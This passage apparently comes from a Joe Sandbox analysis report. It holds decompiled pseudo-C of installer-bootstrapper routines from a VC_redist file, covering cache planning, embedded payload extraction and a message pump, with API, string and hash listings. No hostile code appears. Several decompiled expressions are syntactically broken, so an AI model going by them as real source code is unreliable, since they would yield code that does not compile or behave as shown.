                                                                          				_t94 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t87 & 0x0000ffff | 0x80070000;
                                                                          				_push(_t94);
                                                                          				_push(0x121);
                                                                          				goto L2;
                                                                          			}



























                                                                          APIs
                                                                          • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000000,000000FF,?,00000000,00000000), ref: 00055955
                                                                          • GetLastError.KERNEL32 ref: 00055963
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 000559A4
                                                                          • GetLastError.KERNEL32 ref: 000559B1
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00055B26
                                                                          • CloseHandle.KERNEL32(?), ref: 00055B35
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                          • String ID: @Met$GET$dlutil.cpp
                                                                          • API String ID: 2028584396-1172224916
                                                                          • Opcode ID: 51822875d224c0c0953b82b528d0c56eb026aaeebe20169ae640949132d78740
                                                                          • Instruction ID: cfe1e92f2e1c3bec09041af6ba7057aeef5c901a76fcf00c2f5db41204adb85f
                                                                          • Opcode Fuzzy Hash: 51822875d224c0c0953b82b528d0c56eb026aaeebe20169ae640949132d78740
                                                                          • Instruction Fuzzy Hash: FD618A75A00619ABEF51CFA4CC94BEF7BB9BF08352F114219FE05B2290E77498448BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E00020AAE(void* __ecx, void* __eflags, signed int _a4, intOrPtr* _a8, signed short* _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _t78;
                                                                          				signed int _t79;
                                                                          				intOrPtr* _t82;
                                                                          				signed int _t83;
                                                                          				intOrPtr* _t87;
                                                                          				intOrPtr* _t96;
                                                                          				signed short _t101;
                                                                          				signed short _t104;
                                                                          				intOrPtr* _t109;
                                                                          				int* _t112;
                                                                          				signed int _t113;
                                                                          				void* _t114;
                                                                          				intOrPtr _t122;
                                                                          				signed short _t127;
                                                                          				signed int _t129;
                                                                          				signed int _t130;
                                                                          				signed short _t133;
                                                                          				intOrPtr* _t134;
                                                                          				signed int _t135;
                                                                          				intOrPtr* _t136;
                                                                          
                                                                          				_t114 = __ecx;
                                                                          				_t113 = _a4;
                                                                          				_t134 = _a8;
                                                                          				_t127 = 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				if(E00020E7E(_t113,  *_t134, _a12) == 0) {
                                                                          					_t78 =  *0x7aa60; // 0x0
                                                                          					_t79 = _t78 + 1;
                                                                          					_a4 = _t79;
                                                                          					 *0x7aa60 = _t79;
                                                                          					if(E00020EF3(_t114, _t113,  &_v8) >= 0) {
                                                                          						_t82 = _v8;
                                                                          						_t115 = _a4;
                                                                          						_t124 = 1;
                                                                          						 *_t82 = 1;
                                                                          						 *((intOrPtr*)(_t82 + 8)) = _a4;
                                                                          						_t83 =  *((intOrPtr*)(_t134 + 0x60));
                                                                          						_v12 = _t83;
                                                                          						__eflags = _t83 - 1;
                                                                          						if(_t83 != 1) {
                                                                          							L8:
                                                                          							_t127 = E00020EF3(_t115, _t113,  &_v8);
                                                                          							__eflags = _t127;
                                                                          							if(_t127 < 0) {
                                                                          								goto L2;
                                                                          							} else {
                                                                          								_t87 = _v8;
                                                                          								 *_t87 = 3;
                                                                          								 *((intOrPtr*)(_t87 + 8)) = _t134;
                                                                          								_t89 =  *((intOrPtr*)(_t113 + 0x50)) - 1;
                                                                          								__eflags = _v12 - 1;
                                                                          								_a4 =  *((intOrPtr*)(_t113 + 0x50)) - 1;
                                                                          								if(_v12 != 1) {
                                                                          									L12:
                                                                          									_t129 = 0;
                                                                          									_v12 = 0;
                                                                          									__eflags =  *(_t134 + 0x80);
                                                                          									if(__eflags > 0) {
                                                                          										while(1) {
                                                                          											_v16 =  *((intOrPtr*)(_t134 + 0x7c));
                                                                          											_t127 = E00020F3A(_t124, __eflags, _t113, _t134, _t89,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x7c)) + _t129 * 8)),  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x7c)) + 4 + _t129 * 8)), 0);
                                                                          											__eflags = _t127;
                                                                          											if(_t127 < 0) {
                                                                          												break;
                                                                          											}
                                                                          											_t135 = _a4 * 0x28;
                                                                          											_t130 = _v12;
                                                                          											 *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0xc)) =  *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0xc)) + 1;
                                                                          											_t115 =  *((intOrPtr*)(_v16 + _t130 * 8));
                                                                          											_t124 =  *((intOrPtr*)(_t113 + 0x4c));
                                                                          											 *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0x10)) =  *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0x10)) +  *((intOrPtr*)( *((intOrPtr*)(_v16 + _t130 * 8)) + 0x10));
                                                                          											asm("adc [esi+edx+0x14], eax");
                                                                          											_t129 = _t130 + 1;
                                                                          											_t134 = _a8;
                                                                          											_v12 = _t129;
                                                                          											__eflags = _t129 -  *(_t134 + 0x80);
                                                                          											if(__eflags < 0) {
                                                                          												_t89 = _a4;
                                                                          												continue;
                                                                          											} else {
                                                                          												goto L13;
                                                                          											}
                                                                          											goto L24;
                                                                          										}
                                                                          										_push("Failed to append payload cache action.");
                                                                          										goto L3;
                                                                          									} else {
                                                                          										L13:
                                                                          										_t127 = E00020EF3(_t115, _t113,  &_v8);
                                                                          										__eflags = _t127;
                                                                          										if(_t127 >= 0) {
                                                                          											_t96 = _v8;
                                                                          											 *_t96 = 4;
                                                                          											 *((intOrPtr*)(_t96 + 8)) = _t134;
                                                                          											 *((intOrPtr*)(_a4 * 0x28 +  *((intOrPtr*)(_t113 + 0x4c)) + 0x18)) =  *((intOrPtr*)(_t113 + 0x50)) - 1;
                                                                          											_t127 = E00020EF3(_a4 * 0x28, _t113,  &_v8);
                                                                          											__eflags = _t127;
                                                                          											if(_t127 < 0) {
                                                                          												goto L14;
                                                                          											} else {
                                                                          												_t136 = _v8;
                                                                          												 *_t136 = 6;
                                                                          												_t101 = CreateEventW(0, 1, 0, 0);
                                                                          												 *(_t136 + 8) = _t101;
                                                                          												__eflags = _t101;
                                                                          												if(_t101 != 0) {
                                                                          													 *_a12 = _t101;
                                                                          													_t122 = _a8;
                                                                          													 *((intOrPtr*)(_t113 + 0x34)) =  *((intOrPtr*)(_t113 + 0x34)) + 1;
                                                                          													__eflags =  *((intOrPtr*)(_t122 + 0x44)) - 2;
                                                                          													_t74 =  *((intOrPtr*)(_t122 + 0x44)) != 2;
                                                                          													__eflags = _t74;
                                                                          													 *(_t122 + 0x54) = 0 | _t74;
                                                                          												} else {
                                                                          													_t104 = GetLastError();
                                                                          													__eflags = _t104;
                                                                          													_t133 =  <=  ? _t104 : _t104 & 0x0000ffff | 0x80070000;
                                                                          													__eflags = _t133;
                                                                          													_t127 =  >=  ? 0x80004005 : _t133;
                                                                          													E000137D3(0x80004005, "plan.cpp", 0x860, _t127);
                                                                          													_push("Failed to create syncpoint event.");
                                                                          													goto L3;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											L14:
                                                                          											_push("Failed to append cache action.");
                                                                          											goto L3;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_t127 = E000212BC(_t115, _t113,  &_v8);
                                                                          									__eflags = _t127;
                                                                          									if(_t127 < 0) {
                                                                          										goto L6;
                                                                          									} else {
                                                                          										_t109 = _v8;
                                                                          										 *_t109 = 5;
                                                                          										 *((intOrPtr*)(_t109 + 8)) = _t134;
                                                                          										_t89 = _a4;
                                                                          										goto L12;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t127 = E000212BC(_t115, _t113,  &_v8);
                                                                          							__eflags = _t127;
                                                                          							if(_t127 >= 0) {
                                                                          								_t112 = _v8;
                                                                          								_t115 = _a4;
                                                                          								 *_t112 = 1;
                                                                          								_t112[2] = _a4;
                                                                          								goto L8;
                                                                          							} else {
                                                                          								L6:
                                                                          								_push("Failed to append rollback cache action.");
                                                                          								goto L3;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						L2:
                                                                          						_push("Failed to append package start action.");
                                                                          						L3:
                                                                          						_push(_t127);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				L24:
                                                                          				return _t127;
                                                                          			}



























                                                                          APIs
                                                                            • Part of subcall function 00020E7E: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00020ACD,?,00000000,?,00000000,00000000), ref: 00020EAD
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00020C51
                                                                          • GetLastError.KERNEL32 ref: 00020C5E
                                                                          Strings
                                                                          • Failed to append package start action., xrefs: 00020AF3
                                                                          • Failed to append rollback cache action., xrefs: 00020B2D
                                                                          • Failed to append payload cache action., xrefs: 00020C08
                                                                          • plan.cpp, xrefs: 00020C82
                                                                          • Failed to create syncpoint event., xrefs: 00020C8C
                                                                          • Failed to append cache action., xrefs: 00020BA8
                                                                          • @Met, xrefs: 00020C5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareCreateErrorEventLastString
                                                                          • String ID: @Met$Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                          • API String ID: 801187047-3844694319
                                                                          • Opcode ID: f4f6e639188f20e357f82302d71dd9385211300ca40bf2de91cff0bf06d0622f
                                                                          • Instruction ID: 5dac11af84572c7ab30e07e83f51b2fb5444ae9e0eb60a311b1353dabad6f20b
                                                                          • Opcode Fuzzy Hash: f4f6e639188f20e357f82302d71dd9385211300ca40bf2de91cff0bf06d0622f
                                                                          • Instruction Fuzzy Hash: 75619F75900719EFDB11DF68D880AAEBBF9FF84314F21805AE8059B212DB31EE41CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 69%
                                                                          			E00056BF6(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				void* __ebx;
                                                                          				signed int _t67;
                                                                          				int _t68;
                                                                          				int _t69;
                                                                          				int _t70;
                                                                          				void* _t75;
                                                                          				intOrPtr _t90;
                                                                          				signed int _t94;
                                                                          				intOrPtr* _t95;
                                                                          				intOrPtr* _t96;
                                                                          				intOrPtr* _t98;
                                                                          				intOrPtr* _t99;
                                                                          				signed int _t100;
                                                                          				void* _t101;
                                                                          				signed int _t103;
                                                                          				void* _t106;
                                                                          
                                                                          				_t99 = _a4;
                                                                          				_t93 =  &_v20;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t100 =  *((intOrPtr*)( *_t99 + 0x44))(_t99,  &_v20);
                                                                          				if(_t100 >= 0) {
                                                                          					_t67 = E000536D7( &_v20, _v20,  &_v12,  &_v8);
                                                                          					_t90 = _a8;
                                                                          					while(1) {
                                                                          						_t100 = _t67;
                                                                          						_t103 = _t100;
                                                                          						if(_t103 != 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t68 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"label", 0xffffffff);
                                                                          						__eflags = _t68 - 2;
                                                                          						if(_t68 != 2) {
                                                                          							_t69 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"scheme", 0xffffffff);
                                                                          							__eflags = _t69 - 2;
                                                                          							if(_t69 != 2) {
                                                                          								_t70 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"term", 0xffffffff);
                                                                          								__eflags = _t70 - 2;
                                                                          								if(_t70 != 2) {
                                                                          									goto L10;
                                                                          								} else {
                                                                          									_t17 = _t90 + 8; // 0x5717a
                                                                          									_t75 = _t17;
                                                                          									goto L8;
                                                                          								}
                                                                          							} else {
                                                                          								_t15 = _t90 + 4; // 0x57176
                                                                          								_t75 = _t15;
                                                                          								L8:
                                                                          								_push(_v12);
                                                                          								_push(_t75);
                                                                          								goto L9;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_v12);
                                                                          							_push(_t90);
                                                                          							L9:
                                                                          							_t100 = E000567C4(_t93);
                                                                          							__eflags = _t100;
                                                                          							if(_t100 >= 0) {
                                                                          								L10:
                                                                          								__eflags = _v8;
                                                                          								if(_v8 != 0) {
                                                                          									__imp__#6(_v8);
                                                                          									_t21 =  &_v8;
                                                                          									 *_t21 = _v8 & 0x00000000;
                                                                          									__eflags =  *_t21;
                                                                          								}
                                                                          								_t93 = _v12;
                                                                          								__eflags = _t93;
                                                                          								if(_t93 != 0) {
                                                                          									 *((intOrPtr*)( *_t93 + 8))(_t93);
                                                                          									_t25 =  &_v12;
                                                                          									 *_t25 = _v12 & 0x00000000;
                                                                          									__eflags =  *_t25;
                                                                          								}
                                                                          								_t67 = E000536D7(_t93, _v20,  &_v12,  &_v8);
                                                                          								continue;
                                                                          							}
                                                                          						}
                                                                          						L27:
                                                                          						goto L28;
                                                                          					}
                                                                          					if(_t103 >= 0) {
                                                                          						_t100 =  *((intOrPtr*)( *_t99 + 0x30))(_t99,  &_v16);
                                                                          						if(_t100 >= 0) {
                                                                          							_t101 = E00053760( &_v16, _v16,  &_v12,  &_v8);
                                                                          							if(_t101 != 0) {
                                                                          								L26:
                                                                          								_t100 =  >=  ? 0 : _t101;
                                                                          							} else {
                                                                          								_t92 = _t90 + 0xc;
                                                                          								_t106 = _t90 + 0xc;
                                                                          								while(1) {
                                                                          									_t100 = E000579CC(_t92, _t106, _v12, _t92);
                                                                          									if(_t100 < 0) {
                                                                          										goto L27;
                                                                          									}
                                                                          									if(_v8 != 0) {
                                                                          										__imp__#6(_v8);
                                                                          										_v8 = _v8 & 0x00000000;
                                                                          									}
                                                                          									_t98 = _v12;
                                                                          									if(_t98 != 0) {
                                                                          										 *((intOrPtr*)( *_t98 + 8))(_t98);
                                                                          										_v12 = _v12 & 0x00000000;
                                                                          									}
                                                                          									_t101 = E00053760(_t98, _v16,  &_v12,  &_v8);
                                                                          									if(_t101 == 0) {
                                                                          										continue;
                                                                          									} else {
                                                                          										goto L26;
                                                                          									}
                                                                          									goto L27;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					goto L27;
                                                                          				}
                                                                          				L28:
                                                                          				if(_v8 != 0) {
                                                                          					__imp__#6(_v8);
                                                                          				}
                                                                          				_t94 = _v12;
                                                                          				if(_t94 != 0) {
                                                                          					 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                          				}
                                                                          				_t95 = _v16;
                                                                          				if(_t95 != 0) {
                                                                          					 *((intOrPtr*)( *_t95 + 8))(_t95);
                                                                          				}
                                                                          				_t96 = _v20;
                                                                          				if(_t96 != 0) {
                                                                          					 *((intOrPtr*)( *_t96 + 8))(_t96);
                                                                          				}
                                                                          				return _t100;
                                                                          			}
























                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74654160,?,00057172,?,?), ref: 00056C4C
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056CB7
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056D2F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056D71
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Free$Compare
                                                                          • String ID: label$scheme$term
                                                                          • API String ID: 1324494773-4117840027
                                                                          • Opcode ID: 3290e609340f72498e347094ebb26a06f75e31e7d51186ea3b9434da30f7d22c
                                                                          • Instruction ID: ade9eaad95b0d6d6e8964cf4b796c2a5f7ce19f0d551988ebb948e7eb6d9ff86
                                                                          • Opcode Fuzzy Hash: 3290e609340f72498e347094ebb26a06f75e31e7d51186ea3b9434da30f7d22c
                                                                          • Instruction Fuzzy Hash: 91515F75E00219FBDB61CB94CC44FAFBBB8EF04712F604695E911AB1A0DB32AE44DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E0001CABE(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				short* _v8;
                                                                          				char _v12;
                                                                          				int _v16;
                                                                          				int _v20;
                                                                          				short* _v24;
                                                                          				short* _t47;
                                                                          				intOrPtr* _t56;
                                                                          				void* _t59;
                                                                          				intOrPtr* _t60;
                                                                          				int _t63;
                                                                          				intOrPtr _t64;
                                                                          				intOrPtr _t65;
                                                                          				int _t66;
                                                                          				int _t67;
                                                                          				int _t68;
                                                                          				intOrPtr* _t69;
                                                                          
                                                                          				_t67 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				while(1) {
                                                                          					L18:
                                                                          					_t68 = E0001C108(_a12,  &_v8);
                                                                          					if(_t68 == 0x80070103) {
                                                                          						break;
                                                                          					}
                                                                          					if(_t68 < 0) {
                                                                          						_push("Failed to get next stream.");
                                                                          						goto L31;
                                                                          					} else {
                                                                          						_t69 = _a4;
                                                                          						_t63 = _t67;
                                                                          						_t47 = _v8;
                                                                          						_v24 = _t47;
                                                                          						_v16 = _t63;
                                                                          						if( *((intOrPtr*)(_t69 + 4)) <= _t67) {
                                                                          							L12:
                                                                          							_push(_t47);
                                                                          							_t68 = 0x80070490;
                                                                          							_push("Failed to find embedded payload: %ls");
                                                                          							L33:
                                                                          							_push(_t68);
                                                                          							E0005012F();
                                                                          						} else {
                                                                          							_t66 = _t67;
                                                                          							_v20 = _t67;
                                                                          							do {
                                                                          								_t59 =  *_t69 + _t66;
                                                                          								if( *((intOrPtr*)(_t59 + 4)) != 2) {
                                                                          									goto L10;
                                                                          								} else {
                                                                          									_t64 = _a8;
                                                                          									if(_t64 == 0 ||  *((intOrPtr*)(_t59 + 0x3c)) == _t64) {
                                                                          										_t12 = _t59 + 0x38; // 0xfffeb88d
                                                                          										if(CompareStringW(0x7f, _t67,  *_t12, 0xffffffff, _t47, 0xffffffff) == 2) {
                                                                          											_t20 = _t59 + 0x50; // 0x153d1
                                                                          											_t21 = _t59 + 0x18; // 0x50fffff9
                                                                          											_t68 = E00012D79(_t64, _a16,  *_t21, _t20);
                                                                          											if(_t68 < 0) {
                                                                          												_push("Failed to concat file paths.");
                                                                          												goto L31;
                                                                          											} else {
                                                                          												_t24 = _t59 + 0x50; // 0xb7400ff
                                                                          												_t68 = E00013446(_t64,  *_t24,  &_v12);
                                                                          												if(_t68 < 0) {
                                                                          													_push("Failed to get directory portion of local file path");
                                                                          													goto L31;
                                                                          												} else {
                                                                          													_t68 = E00014013(_v12, _t67);
                                                                          													if(_t68 < 0) {
                                                                          														_push("Failed to ensure directory exists");
                                                                          														goto L31;
                                                                          													} else {
                                                                          														_t26 = _t59 + 0x50; // 0xb7400ff
                                                                          														_t68 = E0001C386(_a12,  *_t26);
                                                                          														if(_t68 < 0) {
                                                                          															_push("Failed to extract file.");
                                                                          															L31:
                                                                          															_push(_t68);
                                                                          															E0005012F();
                                                                          														} else {
                                                                          															 *((intOrPtr*)(_t59 + 0x4c)) = 1;
                                                                          															goto L18;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t47 = _v24;
                                                                          											_t66 = _v20;
                                                                          											goto L9;
                                                                          										}
                                                                          									} else {
                                                                          										L9:
                                                                          										_t63 = _v16;
                                                                          										goto L10;
                                                                          									}
                                                                          								}
                                                                          								goto L34;
                                                                          								L10:
                                                                          								_t63 = _t63 + 1;
                                                                          								_t66 = _t66 + 0x58;
                                                                          								_v16 = _t63;
                                                                          								_v20 = _t66;
                                                                          								_t18 = _t69 + 4; // 0xfffe5de9
                                                                          							} while (_t63 <  *_t18);
                                                                          							_t47 = _v8;
                                                                          							goto L12;
                                                                          						}
                                                                          					}
                                                                          					L34:
                                                                          					if(_v8 != 0) {
                                                                          						E000554EF(_v8);
                                                                          					}
                                                                          					if(_v12 != 0) {
                                                                          						E000554EF(_v12);
                                                                          					}
                                                                          					return _t68;
                                                                          				}
                                                                          				_t56 = _a4;
                                                                          				_t68 = _t67;
                                                                          				if( *((intOrPtr*)(_t56 + 4)) > _t68) {
                                                                          					_t60 =  *_t56;
                                                                          					_t65 = _a8;
                                                                          					do {
                                                                          						if(_t65 == 0 ||  *((intOrPtr*)(_t60 + 0x3c)) == _t65) {
                                                                          							if( *((intOrPtr*)(_t60 + 0x4c)) < 1) {
                                                                          								_t68 = 0x8007000d;
                                                                          								E000137D3(_t56, "payload.cpp", 0x10e, 0x8007000d);
                                                                          								_push( *_t60);
                                                                          								_push("Payload was not found in container: %ls");
                                                                          								goto L33;
                                                                          							} else {
                                                                          								goto L24;
                                                                          							}
                                                                          						} else {
                                                                          							goto L24;
                                                                          						}
                                                                          						goto L34;
                                                                          						L24:
                                                                          						_t67 = _t67 + 1;
                                                                          						_t60 = _t60 + 0x58;
                                                                          					} while (_t67 <  *((intOrPtr*)(_t56 + 4)));
                                                                          				}
                                                                          				goto L34;
                                                                          			}




















                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,?,000000FF,00015381,?,000152B5,00000000,00015381,FFF9E89D,00015381,000153B5,0001533D,?), ref: 0001CB15
                                                                          Strings
                                                                          • Failed to get next stream., xrefs: 0001CBFC
                                                                          • Failed to get directory portion of local file path, xrefs: 0001CBEE
                                                                          • Failed to concat file paths., xrefs: 0001CBF5
                                                                          • Failed to ensure directory exists, xrefs: 0001CBE7
                                                                          • payload.cpp, xrefs: 0001CC16
                                                                          • Failed to extract file., xrefs: 0001CBE0
                                                                          • Failed to find embedded payload: %ls, xrefs: 0001CB41
                                                                          • Payload was not found in container: %ls, xrefs: 0001CC22
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                          • API String ID: 1825529933-1711239286
                                                                          • Opcode ID: 1d72c33232e2f4354df9970ceb6e751db8a039166d2d14dccf2632469edb9632
                                                                          • Instruction ID: 95fae51422c398464e2b94e4c86ec112e72fef00ad2347e623e0820e5f93c631
                                                                          • Opcode Fuzzy Hash: 1d72c33232e2f4354df9970ceb6e751db8a039166d2d14dccf2632469edb9632
                                                                          • Instruction Fuzzy Hash: FB41CD31984219EBEF259E84CC82DEEBBB5BF40711F108169ED05AB252C331DDC0DB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 36%
                                                                          			E00014690(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                          				void* _v8;
                                                                          				struct tagMSG _v36;
                                                                          				void* __ebx;
                                                                          				long _t29;
                                                                          				intOrPtr* _t34;
                                                                          				int _t37;
                                                                          				intOrPtr* _t40;
                                                                          				void* _t41;
                                                                          				void* _t57;
                                                                          				signed int _t58;
                                                                          				intOrPtr* _t65;
                                                                          				void* _t68;
                                                                          				intOrPtr _t71;
                                                                          				int _t72;
                                                                          				int _t73;
                                                                          				void* _t77;
                                                                          
                                                                          				_t77 = __eflags;
                                                                          				_t68 = __edx;
                                                                          				_t58 = 7;
                                                                          				memset( &_v36, 0, _t58 << 2);
                                                                          				_v8 = 0;
                                                                          				PeekMessageW( &_v36, 0, 0x400, 0x400, 0);
                                                                          				_t29 = GetCurrentThreadId();
                                                                          				_t71 = _a4;
                                                                          				_t72 = E0002FC51( &_v8, _t68, _t77, _t71, _t29,  &_v8);
                                                                          				if(_t72 >= 0) {
                                                                          					_t72 = E0001D5C0(_t71 + 0xb8, _v8, _t71 + 0x1c);
                                                                          					__eflags = _t72;
                                                                          					if(_t72 >= 0) {
                                                                          						_t34 =  *((intOrPtr*)(_t71 + 0xc8));
                                                                          						_t73 =  *((intOrPtr*)( *_t34 + 0xc))(_t34);
                                                                          						__eflags = _t73;
                                                                          						if(_t73 >= 0) {
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_t57 = GetMessageW;
                                                                          							while(1) {
                                                                          								_t37 = GetMessageW( &_v36, ??, ??, ??);
                                                                          								__eflags = _t37;
                                                                          								if(_t37 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								__eflags = _t37 - 0xffffffff;
                                                                          								if(_t37 == 0xffffffff) {
                                                                          									_t73 = 0x8000ffff;
                                                                          									E000137D3(_t37, "engine.cpp", 0x2cd, 0x8000ffff);
                                                                          									_push("Unexpected return value from message pump.");
                                                                          									goto L7;
                                                                          								} else {
                                                                          									E000143CD(_t57, _t71,  &_v36);
                                                                          									__eflags = 0;
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									continue;
                                                                          								}
                                                                          								goto L13;
                                                                          							}
                                                                          							 *((intOrPtr*)(_t71 + 0xf8)) = _v36.wParam;
                                                                          						} else {
                                                                          							_push("Failed to start bootstrapper application.");
                                                                          							L7:
                                                                          							_push(_t73);
                                                                          							E0005012F();
                                                                          						}
                                                                          						L13:
                                                                          						_t40 =  *((intOrPtr*)(_t71 + 0xc8));
                                                                          						_t41 =  *((intOrPtr*)( *_t40 + 0x10))(_t40);
                                                                          						__eflags = _t41 - 0x66;
                                                                          						if(_t41 != 0x66) {
                                                                          							__eflags = _t41 - 0x68;
                                                                          							if(_t41 == 0x68) {
                                                                          								_push(0x20000006);
                                                                          								_push(2);
                                                                          								E0001550F();
                                                                          								 *_a8 = 1;
                                                                          								goto L18;
                                                                          							}
                                                                          						} else {
                                                                          							E0001550F(2, 0x20000004, E00023C30( *((intOrPtr*)(_t71 + 0x18))));
                                                                          							 *((intOrPtr*)(_t71 + 0x18)) = 1;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to load UX.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to create engine for UX.");
                                                                          					L2:
                                                                          					_push(_t72);
                                                                          					E0005012F();
                                                                          					L18:
                                                                          				}
                                                                          				E0001D7CF(_t71 + 0xb8);
                                                                          				_t65 = _v8;
                                                                          				if(_t65 != 0) {
                                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                          				}
                                                                          				return _t73;
                                                                          			}

                                                                          APIs
                                                                          • PeekMessageW.USER32 ref: 000146B5
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000146BB
                                                                            • Part of subcall function 0002FC51: new.LIBCMT ref: 0002FC58
                                                                          • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00014749
                                                                          Strings
                                                                          • Failed to load UX., xrefs: 000146FE
                                                                          • user.cpp, xrefs: 00014795
